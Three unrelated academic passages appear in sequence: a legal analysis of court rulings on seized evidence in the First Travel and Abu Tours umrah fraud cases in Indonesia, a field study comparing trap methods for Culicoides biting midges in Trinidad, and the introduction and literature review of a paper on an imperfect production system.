2. Abu Tours Case (Amanah Bersama Umat) Decision Number 3127 K/Pid.Sus/2019 Following the First Travel case, another case involving Hajj and Umrah travel emerged, this time with an even larger number of victims and greater financial losses.This case involved Abu Tours and was initially investigated by the South Sulawesi Regional Police (Polda Sulawesi Selatan) in early 2018.Many reports were received from pilgrims who had paid for trips to the Holy Land of Mecca but were unable to embark on their pilgrimage.During the police investigation, it was revealed that approximately 86,720 pilgrims had their Umrah trips canceled after they had already paid for the journey.The total financial loss in this case amounted to IDR 1.8 trillion. 16ree victims of the Abu Tours case filed for PKPU (Penundaan Kewajiban Pembayaran Utang or Postponement of Debt Payment) as applicants.The applicants were: (1) Hj.
Efforts to Return Confiscated Evidence to Compensate Crime Victims
Starting from the implementation of the judge's decision regarding the status of confiscated evidence, as described above, it can be seen that the judge's decision has not yet provided justice and legal certainty for victims who have suffered losses due to criminal acts.Therefore, various efforts are needed to return confiscated evidence in criminal cases so as not to cause losses to the victims.These efforts include the following: Since the process of evidence seizure and documentation must be clearly and explicitly stated, including evidence related to bankruptcy seizures.This documentation is the basis for the Public Prosecutor in creating case files, ensuring that the evidence used in the case is clear and detailed from the investigation process to the court proceedings.According to Article 46 paragraph (2) of the Criminal Procedure Code (KUHAP), this provision aims to protect the rights of the owner or the person entitled to a property that is in the possession of the suspect/defendant and has been seized for the purpose of the criminal case.
In the context of victims, they can take action through the mechanisms provided in Articles 98 and 99 of the KUHAP.According to these provisions, if the accused's actions cause losses to others, the aggrieved party can request the Chief Judge to combine the compensation claim case within the ongoing criminal trial.This provision also applies to victims who have suffered losses due to a criminal act.Such a request can be submitted at the latest before the public prosecutor reads the indictment or, in the absence of the public prosecutor, before the judge delivers the verdict.If the judge accepts the compensation claim, they will determine the amount of compensation in their judgment.In practice, this mechanism is rarely used by victims, and there is a lack of detailed rules governing the process of combining compensation claims, so public prosecutors often do not provide victims with the opportunity to file claims and gather evidence of their losses.
In reality, the mechanism of compensation claims also serves to ensure the legal objectives.It not only acts as a deterrent to criminal offenders but also provides protection to victims through compensation.The principles of victim protection and recovery are now emphasized in criminal law, particularly in the context of restorative justice.The First Travel case can serve as a lesson in the effort to apply a restorative justice approach to criminal acts that clearly result in financial losses to the victims.If only the public prosecutor informed the victims about the provisions of Article 98 of the Criminal Procedure Code (KUHAP) and encouraged them to request consolidation before the judge, it is highly likely that the proceeds from the auction of First Travel's seized assets would be prioritized to compensate the victims rather than being handed over to the state. 23om the perspective of the Public Prosecutor, efforts can be made through the mechanism outlined in the Attorney General's Regulation (Perja) No. 27 of 2014, in conjunction with Attorney General's Regulation (Perja) No. 9 of 2019 concerning Asset Recovery Guidelines.In essence, these regulations provide guidelines for asset recovery activities conducted by the Prosecutor's Office through the Center for Asset Recovery (Pusat Pemulihan Aset -PPA).These provisions specify that one of the asset recovery activities is the return of assets to victims or rightful claimants, which includes victims of crimes. 24To facilitate this process, prosecutors must demand the return of assets seized from the perpetrator to the victim, explicitly identifying the party entitled to receive the returned assets.This should be accompanied by evidence of ownership, including written evidence and witness testimonies establishing the victim's ownership of the seized property.Within 7 days of a court decision that has obtained legal force, the prosecutor must return the assets/seized property to the victim or rightful claimant based on an order from the Chief Prosecutor's Office. 25 the development of the First Travel case, the convicted parties, Andika Surachman, Anniesa Hasibuan, and Kiki Hasibuan, alias Siti Nuraida Hasibuan, have filed an extraordinary legal remedy in the form of a Judicial Review (Peninjauan Kembali -PK).The Supreme Court has issued a decision regarding this judicial review, as seen in Decision No. 365 PK/Pid Sus/2022.Regarding the judge's considerations related to the status of evidence, the Judicial Review Assembly disagrees with the original verdict in part, specifically regarding evidence in the form of money in bank accounts and economically valuable assets, which had been confiscated for the state.This is because, in this particular case, there are no rights of the state that have been harmed.Based on these considerations, the decision of the Judicial Review Assembly states that as these items of evidence originated from prospective umrah pilgrims, they must be returned to the rightful owners of the evidence, namely, the prospective umrah pilgrims who made payments to PT First Travel, as well as subcontractors whose rights have not been paid by the Petitioners through PT First Travel, with the payment mechanism entrusted to the executor.
The decision of the Judicial Review, including its implications for the status of evidence, does not provide a definitive solution to the issue of evidence status.The absence of a time limitation for filing a Judicial Review, coupled with the possibility of executing a legally binding verdict before the Judicial Review takes place, creates numerous complications concerning the quantity of assets and the connection to bankruptcy seizures for the return of evidence.Therefore, the primary focus should remain on the judge's considerations, especially at the judex factie level, to ensure that the evidence's status is determined accurately and meticulously based on clear factual information.
CLOSING
The judge's considerations, one of the most crucial aspects in determining the value of a judge's decision, particularly regarding the status of evidence subject to seizure and its intersection with bankruptcy seizures, have not been conducted meticulously or thoroughly, taking into account the Implementation of a Judge's Decision Regarding the Evidence Status in Criminal Cases Related ... aspect of victims' losses in criminal cases.Consequently, the evidence becomes state-seized property.
In contrast, in Case No. 3127 K/PID.SUS/2019, the judge did not provide any considerations but merely stated in the verdict that the seized items should be returned to the curator.While the second verdict did take bankruptcy seizures into account, the absence of judge's considerations leaves the decision without a guarantee of legal certainty regarding the restitution of losses suffered by victims of criminal acts.The existence of a judge's decision in the Judicial Review stage concerning the status of evidence can pose various challenges for the Public Prosecutor as the executor of the verdict.
Therefore, various efforts are required for the return of evidence seized from victims to mitigate the losses experienced.This can be achieved through several means, including: improving the administrative system for tracing and documenting evidence subject to seizure, starting from the investigative stage, to make case files at the Public Prosecutor's Office more explicit by classifying the origin and ownership of the evidence, including cases involving bankruptcy seizures.This will facilitate and provide certainty to the judge in determining who is entitled to the evidence in question.
Encouraging an active role on the part of victims through the mechanism provided in Article 98 of the Criminal Procedure Code (KUHAP) to uphold the principle of victim protection and recovery in criminal law, as part of the emphasis on restorative justice.Optimizing the role and position of prosecutors in accordance with the Prosecutor General's Regulations (Perja) in the recovery and return of assets to victims.
context of the First Travel case, which was filed for Suspension of Debt Payment Obligation (PKPU) on July 25, 2017, in the Central Jakarta Commercial Court, case number 105/Pdt.Sus-PKPU/2017/PN Jkt.Pst, and concluded on August 22, 2017.The judgment in the criminal case is found in Decision Number 3096 K/Pid.Sus/2018.Similarly, the case of Abu Tour (Amanah Bersama Umat) was submitted to the Makassar Commercial Court under case number 4/Pdt.Sus-PKPU/2018/PN Mks on September 20, 2018, with the criminal case judgment in Decision Number 3127 K/Pid.Sus/2019.Understanding the application of the judge's decision regarding the status of confiscated evidence is crucial because it plays a vital role in protecting the rights of victims of criminal acts and can provide valuable insights for law enforcement in the resolution of cases, ultimately preventing similar cases in the future, which may employ various modi operandi.RESEARCH METHOD This research is based on normative legal research or doctrinal legal research, which utilizes secondary data sources.To address the research issues, a case approach is employed, focusing on court judgments.The court judgments under scrutiny are Decision Number 3096 K/Pid.Sus/2018 (related to Suspension of Debt Payment Obligation with case number 105/Pdt.Sus-PKPU/2017/PN Jkt.Pst) and are analyzed in comparison with Decision Number 3127 K/Pid.Sus/2019 (related to Suspension of Debt Payment Obligation with case number 4/Pdt.Sus-PKPU/2018/PN Mks.).The selection of these judgments is based on the similarities in cases involving the status of confiscated 9 Ibid. 10Ibid., p. 645. 11See Article 194 KUHAP jo.Article 197 paragraph (1) KUHAP.Implementation of a Judge's Decision Regarding the Evidence Status in Criminal Cases Related ... evidence in criminal cases, which intersect with bankruptcy confiscation, with the underlying motive being the collection of funds from the public for Umrah pilgrimages.DISCUSSION Implementation of Evidence Status in Criminal Cases Related to Bankrupt Confiscation in Judge Decision The definition of evidence in criminal cases pertains to the object of the offense (the object of the crime) and the tools used to commit the offense (the means used to commit the crime), including items that are the result of a crime.Characteristics of items that can become evidence include: 12 1.Material Object Jurnal Bina Mulia Hukum Volume 8, Number 1, September 2023 1. First Travel Case (Decision Number 3096 K/Pid.Sus/2018) The First Travel case occurred in 2017 and involved a criminal act of fraud committed by a husband and wife.They were Andika Surachman and Anniesa Desvitasari Hasibuan, the leaders of PT First Anugerah Karya Wisata (First Travel).They engaged in fraudulent activities by failing to send pilgrims on their scheduled Umrah trips despite having received full payments.The number of victims amounted to 63,310 people, with a total loss of IDR 905.33 billion.Three of the victims, namely Hendarsih, Euis Hilda Ria, and Ananda Perdana Saleh, filed for PKPU (Suspension of Debt Payment Obligations) against PT First Anugrah Karya Wisata (First Travel), which is a Limited Liability Company engaged in Umrah travel services, as the PKPU Respondent.This was outlined in the decision by the Commercial Court of Central Jakarta Number 105/PDT.SUS-PKPU/2017/PN.Niaga.In summary, the contents of this decision are as follows: a. Granting the Petitions for Suspension of Debt Payment ("PKPU") submitted by PKPU Petitioners I, PKPU Petitioners II, and PKPU Petitioners III against PKPU Respondent/PT.FIRST ANUGERAH KARYA WISATA in their entirety.Implementation of a Judge's Decision Regarding the Evidence Status in Criminal Cases Related ... b.Determining Temporary Suspension of Debt Payment Obligations (PKPUS) against PKPU Respondent/PT.FIRST ANUGERAH KARYA WISATA for a maximum period of 45 (forty-five) days from the pronouncement of the aforesaid decision; c.Appointing a Supervising Judge from the Commercial Court Judges at the Central Jakarta Commercial Court as the Supervising Judge to oversee the PKPU process of PKPU Respondent; d.Appointing and commissioning SEXIO YUNI NOOR SIDQI, S.H., ABDILLAH, S.H., and LUSYANA MAHDANIAR, S.H., as Curators, enabling them to act as the Debt Payment Obligation Suspension Process Management Team for PKPU Respondent, and/or as the Curator Team in the event that PKPU Respondent is declared bankrupt due to PKPU failure; e. Instructing the MANAGEMENT TEAM to summon PKPU Respondent and Creditors known by registered mail or through couriers to appear at the hearing, which must be conducted no later than the 45th (forty-fifth) day from the pronouncement of the Temporary Suspension of Debt Payment Obligation Decision; f.Charging the case costs to PKPU Respondent.In its development, the PKPU process for PT First Anugerah Karya Wisata officially concluded with a peace agreement.14The Panel of Judges at the Central Jakarta Commercial Court officially issued a peace agreement or homologation decision.The proposal for the peace agreement presented by First Travel consisted of three main provisions: a. First, First Travel would arrange for the departure of pilgrims for Umrah.b.Second, they would provide refunds to pilgrims who chose not to go.c.Third, First Travel requested a period of six to twelve months to establish a new management team, which meant that the option of arranging departures could only be realized in 2019, while the refund option could be implemented two years after homologation.In the case of PT First Travel, a criminal investigation process against the individuals involved was simultaneously conducted, and they received judgments.The Director of First Travel, Andika Surachman, was sentenced to 20 years in prison, the Director of First Travel, Anniesa Hasibuan, also received a 20-year prison sentence, and the Head of the Finance Division, Siti Nuraidah Hasibuan, alias Kiki, was sentenced to 15 years in prison.15The judgment by the court regarding the determination of the status of evidence in the case of Andika Surachman (Court Decision Number 3096 K/Pid.Sus/2018) remained unchanged at the cassation level, affirming the decision at the appellate level, which in turn upheld the decision at the District Court level.The considerations by the judge regarding the status of evidence in this case were as follows: a.The pieces of evidence were returned to the individuals whose names were mentioned in the decision.b.Regarding pieces of evidence numbered 1 to 529, the Appellant in Cassation/Prosecutor, as stated in the cassation memorandum, requested that this evidence be returned to prospective pilgrims of PT First Anugerah Karya Wisata through the Asset Manager of First Travel's Victims, based on Deed Number 1, dated April 16, 2018, made before Notary Mafruchah Mustikawati, SH, M.Kn, for distribution in a proportional and equitable manner.However, during the trial, it was revealed that the Asset Manager of First Travel's Victims had sent a letter and a statement rejecting the return of this evidence. | 2023-12-16T17:15:43.276Z | 2023-11-04T00:00:00.000 | {
"year": 2023,
"sha1": "02f83fe65286603cba1aa0a0e4b14c3990bf9898",
"oa_license": "CCBY",
"oa_url": "https://jurnal.fh.unpad.ac.id/index.php/jbmh/article/download/1446/672",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "9e16772669e31a88c3af3834e38363d27425eb4d",
"s2fieldsofstudy": [
"Law"
],
"extfieldsofstudy": []
} |
249677392 | pes2o/s2orc | v3-fos-license | Comparison of surveillance trapping methods to monitor Culicoides biting midge activity in Trinidad, West Indies
Abstract Culicoides biting midges (Diptera: Ceratopogonidae) are biting nuisances and arbovirus vectors of both public health and veterinary significance in Trinidad. We compared sampling methods to define the behaviour and bionomics of adult Culicoides populations at a commercial dairy goat farm. Three static trap designs were compared: (a) Centre for Disease Control (CDC) downdraft UV trap; (b) CDC trap with an incandescent bulb and (c) CDC trap with semiochemical lure consisting of R‐(−)‐1‐octen‐3‐ol and CO2 (no bulb). Sweep netting was used to define diel periodicity. A total of 30,701 biting midges were collected using static traps, dominated by female Culicoides furens (>70% of trap collections across all three designs). There was no significant difference in the Margalef's index between the three traps; however, trap designs A and C collected a significantly greater number of individuals than trap B, and trap C gained highest species richness. The greatest species richness and abundance of Culicoides collected by sweep net was observed between 6:00 and 6:15 pm and notable differences in the crepuscular activity pattern of several species were identified. Comparative data on Culicoides species richness, abundance, sex and reproductive status is discussed and can be used to improve surveillance strategies, research designs and risk management.
INTRODUCTION
Trinidad, the larger of the two islands of the Republic of Trinidad and Tobago (T&T), is the southernmost island in the Caribbean archipelago, situated 11 km northeast of the Venezuelan coast ( Figure 1).
Evidence to date indicates that an abundance and diversity of
Culicoides biting midges thrive in the hot and humid climate of both islands (Aitken et al., 1975;Greiner et al., 1989;Tikasingh, 1972). In addition, Trinidad's geographical proximity to the South American mainland facilitates the opportunity for wind-borne introduction of Culicoides (Sellers et al., 1978), providing a potential incursion pathway for Culicoides-borne pathogens from South America. There is also current evidence that Culicoides-borne arboviruses are actively circulating in Trinidad (Brown-Joseph et al., 2017, 2019 and the greater Caribbean region (Anderson et al., 1961;Greiner et al., 1990;Mo et al., 1994;Pinheiro et al., 1981aPinheiro et al., , 1981bTanya et al., 1992).
Culicoides biting midges are tiny hematophagous insects approximately 0.5-3.0 mm in length . Over 1400 species of Culicoides have been identified globally (Borkent & Dominiak, 2020), 46 of which have been recorded in Trinidad (Aitken et al., 1975;Gumms et al., 1984;Tikasingh, 1972). In the Caribbean, Culicoides are biological vectors for viruses that affect animals, such as bluetongue virus (BTV) (Greiner et al., 1990;Mo et al., 1994;Tanya et al., 1992) and epizootic haemorrhagic disease virus (EHDV) (Mo et al., 1994). Brown-Joseph et al. (2017, 2019 recently determined that BTV serotypes 1, 2, 3, 5, 12 and 17, as well as EHDV-6 were co-circulating in Trinidad. In addition to links to arboviruses of veterinary importance, Culicoides are also vectors for human pathogens, including Oropouche orthobunyavirus (OROV) (Anderson et al., 1961;Pinheiro et al., 1981aPinheiro et al., , 1981b and the parasite Mansonella ozzardi (Raccurt, 2018). Culicoides species can also be a severe biting nuisance to humans, livestock and equines, which even in the absence of pathogen transmission, can have a significant impact on tourism, forestry and agriculture (Mellor et al., 2000). Accurately determining the abundance and distribution of vector species of Culicoides feeding on relevant hosts is a critical factor in assessing the risk of Culicoides-borne pathogen transmission according to both region and season. Collections of Culicoides can be made directly from hosts using a range of approaches including droptrapping (Purse et al., 2015), traps attached to hosts (Viennet et al., 2011), or sweep netting (Meiswinkel & Elbers, 2016). These techniques, however, are labour intensive, logistically challenging and are not suitable for large-scale surveillance activities (Melville et al., 2015). Due to these limitations, a broad range of static and more easily deployable traps have been developed that aim to characterize potential vector species richness and abundance. In surveillance activities, the majority of these traps use attractants such as an artificial light source and/or a semiochemical bait that mimics host odour, combined with a source of suction to collect flying insects.
The diversification in trap designs used for surveying Culicoides populations presents a challenge in interpreting abundance and diversity data between regions, countries and research groups (McDermott & Lysyk, 2020). Variation arises both according to the trap design itself, with variation in size, suction, light source and the type of attractant used (Harrup et al., , 2016Venter et al., 2015).
Recent studies comparing surveillance approaches for Culicoides in the Caribbean and South America are rare, despite the biting midge's noted importance as an arbovirus vector and a biting nuisance in the region. Studies carried out roughly 40 years ago in Trinidad and Tobago used various types of insect traps. A study carried out by Tikasingh (1972) Aitken et al., 1975, C. foxi Ortiz 1951, C. furens Poey 1853and C. pusillus Lutz 1913. Trapping sites for this study included dense forest where vertical stratification was observed in the predominant species in this study, C. diabolocus, trapped mostly in the forest canopy.
A second study carried out by Aitken et al. (1975) set out to identify the Culicoides spp present in Trinidad. Incandescent light-suction traps (both New Jersey and CDC models), sweep nets using human bait, Shannon traps, larval collections and emergence traps designed to collect adult Culicoides emerging from larval development material, were used. This study identified 45 Culicoides biting midge species by morphology (wing, mesonotum and leg-band patterns, antennal ratios, papal ratios, proboscis to head ratios, distribution of macrotrichia and sensoria, etc.). These morphological features were extensively documented to generate the biological keys used to identify the Culicoides species in this study.
The objectives of this study were (primarily) to compare the trapping capabilities of commercially available CDC light-suction insect traps fitted with either an ultraviolet (UV) light bulb, incandescent (white) light bulb or a semiochemical lure consisting of R-(À)-1-octen-3-ol and carbon dioxide (CO 2 ) supplied by sublimating dry ice (light bulb was removed from the CDC light-suction trap). Their effectiveness in relation to specimen yield, species variety, sex ratios and female reproductive status was measured and compared. Sweep net collections were also compared against the (three) static traps. The secondary aim was to discern the crepuscular activity patterns of the Culicoides species that were identified from the sweep net trapping catchments.
Study location
This study was conducted at a small commercial dairy goat farm It is worth noting that the Jarvis Dairy Goat Farm is the only 'no kill' farm in Trinidad that allows the animals to live out their natural lives on the farm. Location 1 was above thick vegetation with the traps hung from the branch of a tree with dense foliage, amidst high grass and above damp leaf litter. Location 2 was sited close to cultivated land with the trap hung from a citrus tree (no flowers or fruits present) above exposed loamy, topsoil, adjacent to cultivated agricultural beds with little to no leaf litter. Location 3 was above a concrete slab extension
Identification of Culicoides specimens
For samples collected using the traps and the sweep net, Culicoides were separated from other arthropods (bycatch) and identified, where possible, to species level, by morphology using a biological identification key (Aitken et al., 1975). Specimens of the morphologically cryptic subgenus Hoffmania Fox that were not discernable to their exact group (hylas or guttatus) or species were identified to subgenus level only. The species, sex and reproductive status for female specimens (nulliparous/non-pigmented; blood fed; gravid; parous/pigmented) were recorded for all Culicoides collected.
F I G U R E 2 Plan drawing of the dairy goat farm (not drawn to scale) showing the fixed locations (triangles 1, 2 and 3) where each of the three traps were placed overnight for nine nights: Location 1 was amid dense trees and underbrush; location 2 was under a lime tree adjacent to cultivated soil and location 3 was over an exposed concrete slab. The red arrows starting at the yellow X shows the set path taken to sweep net around the goat shed on four separate evenings for the last 2 h of daylight. See Figures S1 and S2 for photos.
Comparison of Culicoides species richness with respect to trap attractant and location
The number of Culicoides species (i.e., the species richness/variety) collected by the three trap types, was compared using Margalef's index, such that Margalef's index = (S À 1)/ln N, where S is the total number of species collected in a sample (i.e., one trap collection), N is the total number of individuals in the sample and ln is the natural logarithm (Margalef, 1958). Margalef's index was also calculated to compare the species richness among the three different environments found at the three set positions (locations 1-3).
To investigate the effect of trap type on the number of Culicoides and species distribution, generalized linear mixed models (GLMM) with a binomial error distribution and a logit link function were implemented in a Bayesian setting using the bglmer function in package 'blme' v. 1.0-2 (Dorie, 2014). The GLMMs were fitted by maximum likelihood with the Laplace approximation with flat covariance priors and normal fixed priors, with day of collection included as a random effect, trap type and trap location considered as potential additional fixed predicator. Final models were obtained using a backwards-stepwise-selection-based procedure (Zeileis et al., 2008), such that variables that did not contribute significantly to explaining variation in trap catch were successively eliminated on the basis of the Bayesian information criterion (BIC) (Schwarz, 1978) until the removal of a variable caused an increase in BIC of two or more. Differences in trap catch size between trap types were then assessed using multiple Tukey's all-pair comparisons using the 'glht' function in package multcomp version 1.4-8 .
In addition, linear and polynomial regression models in 'stats' v. 3.5.0 package (R Development Core Team, 2018) were utilized to visualize the activity profile of Culicoides and select Culicoides species collected by sweep netting with time of collection or a quadratic function of time of collection considered as a fixed predictor. Both Akaike information criterion (AIC) (Akaike, 1973) using function 'AIC' in the 'stats' v. 3.5.0 package (R Development Core Team, 2018) and Wald tests, using function 'wald test' in the lm test v.0.9-36 package (Zeileis & Hothorn, 2002), were utilized to assess model fit with and without a quadratic term.
Comparison of trap attractants
A total of 30,701 Culicoides specimens were collected over the nine nights of trapping (Table 1) Female Culicoides dominated trap collections (96.33%; n = 29,594), with a ratio of 26.73 collected for every male Culicoides.
It is also notable that the mechanical sweep net method yielded a relatively high proportion of males (9.93%; n = 95) when compared to the static traps (Table 4).
In addition to morphologically cryptic specimens from the subge- Table S4).
Comparison of crepuscular Culicoides activity by sweep net collection
Female Culicoides also dominated the sweep net collections (90.15%; n = 879) where the majority (83%; n = 730) were nonpigmented, 9.7% (n = 85) were pigmented and 5.8% (n = 51) were blood fed. The reproductive status of the remaining 1.5% (n = 13) was undetermined. No gravid females were collected using the sweep net method. However, it was noted that the relative proportion of blood-fed females collected using the sweep net (5.8%; 51 out of 879 total) was~23 times higher than the relative proportion of blood-fed females (0.25%; n = 72) collected by all three traps with attractants (A, B and C) combined (n = 29,217) ( Figure S3).
Linear and polynomial regression analyses revealed that the mean number of Culicoides collected using the sweep net increased as daylight intensity decreased with time ( Figure 6). No significant differences were observed between the numbers of males and females active at each time point (Table 4). The number of Culicoides species (i.e., species richness) collected during each sweep net collection interval ranged from two to four, with C. furens and C. pusillus present throughout the entire 2-h collection periods. The highest species richness (four different species) occurred between 6:00 and 6:15 PM ( Figure S3). Of the two species that dominated the sweep net collections, C. pusillus activity gradually increased and peaked at 5:30 PM, whereas C. furens activity increased continually with the approaching sunset up to 6.15 PM ( Figure 5). It was also noted that C. aitkeni consistently appeared from 5:00 PM onwards on all four nights of trapping despite trapping starting at 4:15 PM (Figure 4). The overall Margalef's index for the sweep net method was 0.872, which indicated that the species richness (Margalef's index) derived from this mechanical trapping method was notably higher than that for traps A, B and C with attractants (Table 2).
DISCUSSION
This study compared the effectiveness of three static traps using different wavelengths of light (UV vs. incandescent light) and a semiochemical lure ((R)-(À)-1-octen-3-ol/CO 2 ) as attractants. The surveillance (trapping) capabilities of the static traps were compared to a mechanical (sweep net) trapping method in relation to Culicoides specimen yield, sex, reproductive status and species richness, unlike in earlier trapping studies carried out in Trinidad (Aitken et al., 1975;Tikasingh, 1972).
Trap efficiency and feasibility for surveillance activities
Traps A (UV light) and C (semiochemical lure [(R)-(À)-1-octen-3-ol/ CO 2 ]) were significantly more efficient than trap B (incandescent light) in catching large numbers of Culicoides, collecting as much as 25 and 174 times more Culicoides specimens respectively than trap B. This observation is consistent with previous studies that compared incandescent to UV light traps (Venter et al., 2006) and UV light traps to semiochemical traps . It should however be noted that the number of specimens collected was skewed by the high numbers of C. furens caught with the semiochemical trap (C) located near cultivated mulberry bush beds. Culicoides furens is not a known vector species, although it is responsible for high levels of nuisance biting.
However, C. furens is an autogenous species with a very wide host range, which may explain why it was present in such high numbers on the farm.
The observation that traps A (UV light) and B (incandescent light)
had relatively high proportions of (non-Culicoides) bycatch, whereas trap C (semiochemical lure [(R)-(À)-1-octen-3-ol/CO 2 ]) exclusively trapped Culicoides females was not surprising since haematophagous Note: Total males: females caught in each location are also presented. The trap type that collected the majority of each species at the respective location is in parentheses. Species richness of the three locations was assessed using Margalef's index = (S À 1)/ln N, where S is the total number of species collected at the location, N is the total number of individuals collected there and ln is the natural logarithm (Margalef, 1958).
Culicoides locate their hosts primarily through the olfaction and the detection of body heat Mands et al., 2004;Scheffer et al., 2012;Venter et al., 2011). High proportions of bycatch in collections, as seen with the light-baited traps (A and B), will impact the time and labour requirements when planning Culicoides trapping.
Therefore, using traps with very little to no bycatch, like trap C (semiochemical lure [(R)-(À)-1-octen-3-ol/CO 2 ]), will aid to minimize the potential drain on restricted labour resources. This benefit may however be offset by the high cost and impermanence of semiochemical lures, so this will not be suited to projects/studies with relatively long timelines and/or low budgets, as is the case with most Culicoides furens, which is primarily known to breed in salt marshes and mangrove swamps (Tikasingh, 1972), dominated trap collections (90.9%) and sweep net collections at the same site (88%), which is consistent with previous studies conducted in Trinidad (Tikasingh, 1972) and in Southeast USA (Breidenbaugh et al., 2009).
The predominance of C. furens on the farm is most likely due to the proximity of the brackish marshland, only 0.1 km away, a favourable habitat for this species. The adjacent South Oropouche Swamp is located where the freshwater of the South Oropouche River mixes with saltwater as it empties into the Gulf of Paria. Although C. furens is not a vector species for any known viruses or parasites , it is well documented as a nuisance species in several tourism-dependent countries (Aitken et al., 1975) and was indeed a source of distress to the animals on the farm.
Culicoides guyanensis is also known to breed in salt-water marshes (Aitken et al., 1975); however, its abundance was very low in the trap collections by contrast to C. furens. Although C. guyanensis has been collected throughout the year in Trinidad (Brown-Joseph et al., unpublished data), the peak abundance for this species is at the start of the rainy season in May, by contrast to C. furens which is most abundant in the dry season starting in February, when this study was conducted (Aitken et al., 1975). Tikasingh (1972) also found C. pusillus to be primarily present in the rainy season, with peak abundance from June to August, which may explain its relative low abundance during this study. There is little to no information on the relative seasonality of the other species collected in this study (C. aitkeni, C. foxi, C. insignis, C. insinuatus and C. ocumarensis) and how this may have impacted their relative abundance.
Identification of Culicoides vector species
The identification of vector species found in a particular location/ region is of high importance when conducting surveillance studies. In order to gain a full understanding of the epidemiology of vector-borne disease and to aid in predicting timelines for potential outbreaks, it is important to have a full understanding of the preferred habitat and seasonal abundance throughout the year of the vector species in question.
Although C. furens and C. guyanensis are not considered vector species, C. insignis and C. pusillus are. It has been established that C. insignis is a competent vector for both BTV and EHDV (McGregor et al., 2021). BTV (serotype 3) has also been isolated from C. pusillus females in Jamaica; identifying C. pusillus as a potential vector species for BTV . So, despite the low numbers trapped in this study, two vector species for BTV and EHDV were identified on the goat farm, indicating a possible route of transmission for these two viruses among the goats on the farm. Confirmation of this via group-specific real-time PCR for BTV and EHDV was outside the scope of this particular study.
Trap collections: temporal activity
The majority of Culicoides species exhibit a crepuscular peak in activity (Meiswinkel & Elbers, 2016, Mellor et al., 2000, Sanders et al., 2012; however, twilight is a period when light-suction traps will likely exhibit decreased efficacy due to the competition between their light source acting as an attractant versus residual daylight in the environment. Trinidad's close proximity to the equator (~10 north of the equator) means that the twilight period is fairly short (~45 min) and consistent throughout the year, making it easier to discern any trends among Culicoides activity. Although the peak activity for all of the collected species occurred in the time intervals nearest sunset as expected, it was noted that a particular species, C. aitkeni, exhibited more specific diurnal activity, indicating a potential for light-suction traps to underestimate or even miss these species in their collections.
SUPPORTING INFORMATION
Additional supporting information may be found in the online version of the article at the publisher's website. | 2022-06-16T06:16:18.757Z | 2022-06-15T00:00:00.000 | {
"year": 2022,
"sha1": "bf762ae7f1e579372f5d37bca8f93287522c16eb",
"oa_license": null,
"oa_url": null,
"oa_status": "CLOSED",
"pdf_src": "Wiley",
"pdf_hash": "5b48465fa58a86d2c36f3133769fcb6105fedfec",
"s2fieldsofstudy": [
"Environmental Science"
],
"extfieldsofstudy": [
"Medicine"
]
} |
53473873 | pes2o/s2orc | v3-fos-license | An Economic Production Model with Flexibility
This paper develops a model to determine the optimal reliability and production rate that achieves the biggest total integrated profit for an imperfect production process under allowable shortage. In this system, production facility may shift ‘in-control’ state to an ‘out-control state’ at any random time. The basic assumption of the classical EPL model is that 100% of product is of perfect quality. But practically this is not true. More specifically, the paper extends the paper of Sana (S.S.Sana, 2010, an economic production lot size model in an imperfect production system. European Journal of Operational Research 201, 158-170). Here we consider two type of production process in a cycle time. One is ‘in-control’ state at the starting of the production which provides conforming quality items and second one is ‘out-control’ state after certain time due to higher production rate and production run time. The proposed model is formulated assuming that a certain percent of total product which described by a function is defective. The imperfect quality items are reworked at a cost to restore its quality to the original one. The total cost function is illustrated by numerical examples and also its sensitivity analysis is carried out.
Introduction
It is generally admitted that inventory management is affected by the imperfect quality of goods and this aspect has to be taken into account. In the last few decades, the development of inventory control models and their uses are popularized by academicians as well as industries. However, one of the weaknesses of current inventory models is the unrealistic assumption that all items produced are of good quality. In classical economic production lot size (EPL) model, the production rate of a machine is assumed to be predetermined and inflexible (Hax and Candea , 1984). However, production rate can be easily changed (Schweitzer and Seidmaan, 1991). In other words, production rate in many cases should be treated as decision variable. Empirical observations indicate that as machine production rate is increased, tool or die costs increase (Drozda and Wick, 1987). The treatment of production rate as a decision variable is especially appropriate for automated technologies that are volume flexibility. Volume flexibility of a manufacturing system is defined as its ability to be operated profitably at different overall output levels. Volume flexibility permits a manufacturing system to adjust production upwards or downwards within wide limit period to the start of production of a lot. It is a major component of Flexible Manufacturing System (FMS). It helps to reduce the rate of production to avoid rapid accumulation of inventories and non-conforming (defective) items. Advances in computer sciences have contributed to development of Volume Flexible Manufacturing Systems. In modern automobile industries, computer-controlled machines have been introduced to increase productivity and high quality of products. The speed of production at such machines is controlled by a computer. It is rationale that an increasing rate of production increases the probability of components (machinery parts, labor etc.) failure and thus nonconforming quality items increases. Generally, percentage of defective items increases with increase of production rate and production-run time. Because, almost all machinery system may undergo malfunctioning or unsatisfactory performance after some time and also these increase with time. At the start of production, process is 'in-control' state and the items produced are of conforming quality. After some time, it may shift to an 'out-of-control' state while in process, there by resulting in the production of nonconforming quality items.
Several researchers have initiated to analyze various problems related to imperfect production process by devoting their time and efforts. According to Rosenblatt and Lee (1986), the time of shift from 'in-control' state to 'outof-control' state follows an exponential distribution with a mean 1/m, assuming m is a small value. They have derived an Economic Manufacture Quantity (EMQ) formula by using approximate value up to second order of Maclaurin series expansion of the exponential function. Rosenblatt (1987, 1989), on the basis of RL model (Rosenblatt and Lee, 1986), have determined an optimal production run-time and optimal inspection policy simultaneously to monitor the production process. Cheng (1991) have derived a closed form expression for the optimal demand to satisfy order quantity and process reliability while the demand exceeds supply and the production process is imperfect. Khouja and Mehrez (1994) have considered the elapsed time until the production process shifts to an 'out-of-control' state to be an exponentially distributed random variable. The results of this model indicate the aspect for both weak and strong relationship between the rate of production and process quality. Hariga and Ben-Daya(1998) and Kim and Hong (1999) have extended RL model, considering the general time required to shift distribution and an optimal productionrun-time shown to be unique. Makis (1998) has studied several properties of the optimal production and inspection policies in imperfect production process. Some of the above modeler has showed that defective items can be reworked instantaneously at a cost. In the model of Wang (2004), an imperfect EMQ model for production which are repaired and sold under a free-repair warranty policy (i.e., the cost incurred by a defective item after its sale) discussed by Yeh et al. (2000) has been extended to consider general shift distribution. Sheu and Chen (2004) Lee (2005a-c) has extended the model to increase the service level and reduce the defectives in imperfect production system with imperfect quality of the products and imperfect supplied quantity. Chen and Lo (2006) have developed an imperfect production system with allowable shortage and the products are sold with free minimal repair warranty. The probabilities of non-conforming items in both the states (out-of-control and in-control) are different. They have formulated a cost minimization model in which the production-run-length and the time length when back-order is replenished are decision variables. Lee (2006) 